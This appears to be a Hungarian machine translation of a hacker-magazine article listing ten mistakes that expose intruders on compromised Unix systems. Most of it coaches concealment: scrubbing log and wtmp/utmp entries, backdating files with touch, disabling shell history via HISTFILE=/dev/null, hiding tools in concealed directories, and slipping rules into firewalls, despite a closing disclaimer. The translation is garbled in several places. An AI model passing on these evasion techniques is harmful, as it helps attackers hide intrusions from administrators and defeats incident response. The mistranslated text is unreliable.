    Kíváncsi vagy, milyen jogsértésekről beszélünk? Ebben a cikkben röviden felvázolok tíz hackerhibát, amelyek véleményem szerint a legnépszerűbbek. A hibák főként unix-szerű rendszerekre vonatkoznak, ezért arra kérem a Windows rajongókat, hogy ne reménykedjenek.

    1. Tisztítási naplók

    Furcsa módon kevesen szeretik a naplókat tisztítani egy feltört rendszerben. De a rendszergazda a naplókon keresztül észleli a behatolást. Nézzük meg a naplók létrehozásának mechanizmusát egy unix-szerű operációs rendszerben.

    Általános szabály, hogy a szolgáltatási információk a syslog() függvény használatával egy fájlba kerülnek. Ez a függvény közvetlenül működik a syslogd démonnal vagy annak alternatívájával (például syslog-ng). Ennek a démonnak saját konfigurációs fájlja van (alapértelmezés szerint /etc/syslog.conf), amely részletezi a naplófájlok helyét és egy adott napló feltételeit, hogy megfelelően el tudja különíteni a legyeket a szeletektől. A hacker gyakran elfelejti, hogy az adminisztrátor megváltoztathatja az alapértelmezett naplók nevét a /var/log/secure átirányításával, például a /usr/admin/secure címre. Ezenkívül a naplók egy adott felhasználó konzoljára írhatók, ami nagymértékben bonyolítja a hacker helyzetét.

    Az ilyen fájlok tisztítását rendkívül óvatosan kell végezni: megbízható naplótörlőkkel vagy kézzel (ideális). Személyesen találkoztam ilyen naplótörlőkkel, amelyek használata után az adatnaplózás leállt. Úgy gondolom, hogy egy tekintélyes admin ebben a helyzetben gyorsan észreveszi a rendszer problémáit.

    Furcsa módon nagyon könnyű kézzel törölni a szövegnaplókat. Először is meg kell találnia, hogy vannak-e eltávolítandó adatok a naplókban (például a hacker IP-címe vagy bejelentkezési adatok a rendszerben). Ezt az információt ezután gondosan törli egy külön naplóból, majd átirányítja egy ideiglenes fájlba. És csak ezután nevezik át az ideiglenes fájlt az igazira. Ezeket a műveleteket a szabványos grep és mv parancsokkal hajtják végre. Külső szerkesztőkkel (vi, ee, mc) is végrehajthatók.
    Ha a szöveges naplók tisztítása nem okoz különösebb aranyér kialakulását, akkor a bináris fájlok feldolgozása valamivel nehezebb. Itt nem nélkülözheti a speciális naplótörlőket, amelyek megértik a következő fájlok szerkezetét: /var/log/wtmp, /var/log/lastlog és /var/run/utmp.

    A hackerek gyakran egy egyszerű rm paranccsal oldják meg a problémát. De ha az adminisztrátor azt látja, hogy az elmúlt hónapban nem voltak felhasználók a rendszerében, a támadó sem fogja jobban magát. Csak azt az utmp fájlt törölheti, amely a rendszerben lévő felhasználókat jeleníti meg pillanatnyilag idő. A törlés után a touch parancsnak kell következnie, és újra létre kell hoznia a fájlt. Ha ez nem történik meg, akkor az /usr/bin/w bináris az utmp hiányára panaszkodik, és az online felhasználók nem kerülnek rögzítésre.

    2. Dátum módosítása a fájlokon

    A fájlokon szereplő dátum a hacker gyenge pontja. A rendszerfigyelő programok ekkorra határozzák meg a rootkit telepítését vagy a rendszerfájlok módosításait. A fájl dátumát a touch paranccsal módosíthatja a -t paraméterrel, majd a dátumot a következő formátumban: MonthDayHourPercYear. A crackerek gyakran elfelejtik visszaállítani a dátumot a régire a conf szerkesztése vagy a bináris átírása után. Az adminisztrációs segédprogramok gyorsan észlelik a rendszer változásait, és részletes jelentést küldenek a rendszergazdának.

    3. Csapattörténet

    Minden shell nélkülözhetetlen tulajdonsága a felhasználó által begépelt parancsok előzményeinek tárolása. Ez azért történik, hogy meg tudjon ismételni egy korábban begépelt parancsot. A parancsok történetét tartalmazó fájlt a hacker elsősorban a rendszer sikeres feltörése után tanulmányozza, hogy kezdeti információkat szerezzen a rendszergazda tevékenységéről, vagy jelszavakat kinyerhessen a konzolprogramokból.

    De ha a másik oldalról nézed, akkor az admin lehet paranoiás, rendszeresen tanulmányozza a saját történelemfájlját. És ha egy hacker elég sokat ásott a rendszerben, így hagyva maga után a rootkitek vagy DoSer-ek telepítésének történetét, a rendszergazda reakciója kiszámíthatatlan, ezért minden hackernek időben le kell fednie a nyomait.

    Az előzményfájl helyét a HISTFILE környezeti változón keresztül találhatja meg, ha megtekinti a konzol echo $HISTFILE paranccsal. Ennek megfelelően az export HISTFILE=/dev/null parancs után a parancsok írása a fájlba leáll. Figyelem! Ez a technika csak az aktuális munkamenet időtartama alatt működik, így a hackernek minden alkalommal végre kell hajtania a parancsot, amikor megjelenik a rendszerben.

    4. A rendszer megfertőzése rootkitekkel

    Bármilyen paradoxnak is tűnik, a rootkitek telepítése könnyen leleplezheti a hackereket. Először is, a rendszerfájlok cseréjénél általában 2-es hibát követ el, mivel az eredeti dátum beállítása egy csomó binárison enyhén szólva hosszú és sportszerűtlen. Másodszor, ha az admin beállította új verzió csomagot (pl. binutils), akkor a régit a rendszer tetejére telepítve nem vezet semmi jóra. Sőt, a támadó kiadhatja az alias által megadott parancsbillentyűket. Például a /bin/ls régi verziója nem érti a --colors billentyűt, és sok rootkit pontosan a régi verziót tartalmazza rootkit új rendszeren, a hacker automatikusan aláírja saját halálos ítéletét.

    5. A szoftver telepítése

    Miután feltört egy rendszert, a támadó gyakran saját szoftvert telepít rá, például zoknit vagy nmap-et, ami teljesen logikus - szüksége volt egy tesztrendszerre, és meg is kapta. De még akkor is, ha a támadó folyamatai rejtettek, ebben az esetben a rendszergazda észlelheti a nyitott 1080-as portot a rendszerben. Ezután gyorsan kitalálja, mi történik, és ezáltal felfedi a hacker álcáját.

    Valójában a hackelés után a támadó elemzi az adminisztrátor tevékenységét, és következtetéseket von le a szerver elhanyagoltságának mértékéről. De továbbra sem szabad gyökérkönyvtárakba telepíteni a programjait. Ennek elkerülése érdekében a hackernek létre kell hoznia egy saját külön rejtett könyvtárat, és telepítenie kell az összes harci szoftvert. Ez a ./configure --prefix=/path/to/hidden/xakep_dir paranccsal érhető el a csomagok telepítésekor.

    6. Szkennelés feltört rendszerről

    A leggyakoribb hiba a felsoroltak közül. Végül is egy sérült szerverről végzett vizsgálat soha nem vezet semmi jóra. Győződjön meg róla Ön is: a támadó nmap-pel vagy más elérhető szkennerrel átvizsgálja az alhálózatot, amely után a vizsgált hálózat törvénytisztelő rendszergazdája panaszt írhat a vizsgálatot végző céggel szembeni visszaélés miatt, elküldve az összes tényt igazoló naplót. A behatolásról a céghez rendelt biztonsági szolgálat arra a következtetésre jut, hogy a szerverük meghibásodott, és az adminisztrátor fejére ütöttek, egyértelmű, hogy a hacker nem fog a szerveren élni .

    Természetesen ez a helyzet messze nem jellemző. Bátor rendszergazdáink tehetetlensége miatt a hackerek gyakran megússzák a szkennelést. De ne feledje, hogy extra bajba kerülhet, ha aktív tevékenységet végez egy feltört szerverről.

    7. Tűzfalszabályok módosítása

    A tűzfal az adminisztrátor személyes ügye. És ha telepítette, akkor feltételezhető, hogy úgy ismeri az összes szabályt, mint a tenyerét. Ha a hacker ízlése szerint testreszabja őket, akkor előbb-utóbb a rendszergazda leállítja ezeket a műveleteket. A kivétel lehet a szörnyű szabályhalmok, amelyeket nyilvánvalóan nem a rendszergazda állított össze. Nem okoz katasztrófát, ha ehhez a robbanásveszélyes keverékhez egy észrevétlen bejutást adunk.

    Ha a tűzfal több ember által is olvasható szabályt tartalmaz, és a HISTFILE-ből ítélve ezeket az adminisztrátor rendszeresen figyeli, akkor nincs más hátra, mint betartani, vagy megváltoztatni a tűzfal forrását (C guruknak). Mellesleg ez a legmenőbb lehetőség.

    8. Új felhasználók hozzáadása

    Egy meglehetősen tipikus helyzet: egy rendszer feltörése után egy hacker megosztja benyomásait a feltörésről az IRC-n vagy az ICQ-n. Az övé legjobb barátok azonnal könyörögni kezdenek kagylókért személyes szükségletekre. Kicsit gondolkodás után a hacker felveszi a felhasználót a rendszerbe, megnyugtatva magát, hogy a shell nem root, hogyan zavarhat engem. Másnap az adminisztrátor reggeli jelentést kap a rendszer rendellenes eseményeiről, és talál benne egy érdekes sort, például:

    Új felhasználók:
    xakep:x:31337:31337:Xakep felhasználó:/home/xakep:/bin/bash

    Most már búcsút mondhat egy root fióknak egy feltört autón.

    Ennek elkerülése érdekében a rendszerben ne legyenek új felhasználók a hackertől. A legjobb a meglévő erejét tesztelni számlákatés használja őket.

    9. Illetéktelen személyek beléptetése a rendszerbe

    Ez a hiba hasonló az előzőhöz, de van egy különbség. A hackert gyakran arra kérik, hogy a saját hátsó ajtóin keresztül férhessen hozzá egy szerverhez. Az ilyen hozzáférés megadása után azonnal elbúcsúzhat a szervertől. Minden ember más, és egy kívülálló könnyen megszegheti az összes fent leírt szabályt egy munkamenet során, ezzel megtörve az álcát a rendszerben.

    Egy hozzáértő hacker soha nem teremt ilyen helyzeteket. Ráadásul sehol sem beszél hackelésről, mindig a saját biztonságát helyezi előtérbe. Szabálysértés ennek a szabálynak Ez csak akkor lehetséges, ha meg van győződve arról, hogy a hozzáférés megadása után nem lesz szükségtelen probléma.

    10. Hacker szakma választása

    Igen, jól hallottad! A hacker olyan, mint egy sapper, amikor először hibázik a szakma kiválasztásakor. Minden feltörés végzetes lehet számára, és ezzel ő maga is tisztában van. De ezzel nem tud belenyugodni, tekintve, hogy a hackelés extrém sport. Ha még mindig azon tűnődsz, hogy legyél-e hacker vagy sem, akkor adok néhány tanácsot. NEM! Hackernek lenni már nem annyira divat, ráadásul veszélyes is. Tehát jobb valami mást csinálni, például orosz nyelvű iskolai záródolgozatokat árulni az interneten keresztül :).

    Valójában ezek mind olyan hibák, amelyek szomorú következményekkel járnak. De még egyszer megismétlem, ezek a hibák csak egy olyan rendszerben relevánsak, amelynek élén egy lelkiismeretes adminisztrátor ül, aki méltán kapja meg fizetését. A futó szervereken, ahol az adminisztrátor részeg állapotban és csak ünnepnapokon figyeli a rendszert, azt csinálhat, amit akar – nem lesz rosszabb.

    Ez az anyag azt a tipikus eseteket hivatott bemutatni, amikor a hackerek egy feltört rendszert adnak ki. Ez nem tekinthető cselekvési útmutatónak. Mielőtt valami helyrehozhatatlan dolgot csinálna, olvassa el újra a 10. pontot. Annyi érdekes dolog van még a világon :).

    Nyomon követési segédprogramok vagy rendszergazdai segítség

    Ez a cikk többször említette a rendszergazdai segédprogramokat. Ezek olyan programok, amelyek naponta átvizsgálják a rendszert (binárisok md5 összege, konf-ok változásai, folyamatok stb.), és összehasonlítják az adatbázisukban lévő változásokat. Ezt követően jelentést készítenek, és elküldik az adminisztrátornak. Maga a program démon formájában lefagy, vagy a crontab indítja el. Ilyen segédprogram például a tripwire.